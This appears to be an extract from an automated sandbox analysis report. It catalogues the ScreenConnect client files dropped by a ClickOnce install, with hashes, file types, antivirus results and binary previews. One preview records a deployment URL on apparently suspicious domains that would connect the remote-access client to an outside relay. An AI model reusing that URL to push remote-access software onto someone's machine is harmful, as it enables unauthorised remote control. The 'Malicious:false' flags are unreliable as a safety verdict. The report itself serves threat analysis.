                                                                                                                                                                              SHA-512:717D1857949B12AC6145DE66D5C93611876BE395DD95D9068B61D4B76BF45EF6E22C341E3FD01E7D3294033E0BD7F532F378BC35969806164A647D90DC17F364
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.m.o.l.a.t.o.r.i.i.s.m...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.p.i.c.k.0.9.y...t.o.p.&.p.=.8.8.8.0.&.s.=.f.f.0.6.1.9.b.3.-.c.d.d.a.-.4.e.7.4.-.9.7.6.0.-.1.4.9.d.3.9.b.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):197120
                                                                                                                                                                              Entropy (8bit):6.58476728626163
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1041
                                                                                                                                                                              Entropy (8bit):5.147328807370198
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                              MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                              SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                              SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                              SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):68096
                                                                                                                                                                              Entropy (8bit):6.068776675019683
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.084538887646832
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                              MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                              SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                              SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                              SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505346220942731
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):548864
                                                                                                                                                                              Entropy (8bit):6.031251664661689
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.1303806593325705
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                              MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                              SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                              SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                              SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1721856
                                                                                                                                                                              Entropy (8bit):6.639136400085158
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.057585371364542
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                              MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                              SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                              SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                              SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.31175789874945
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):601376
                                                                                                                                                                              Entropy (8bit):6.185921191564225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2573
                                                                                                                                                                              Entropy (8bit):5.026361555169168
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                              MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                              SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                              SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                              SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.954687824833028
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                              MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                              SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                              SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                              SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                              Malicious:false
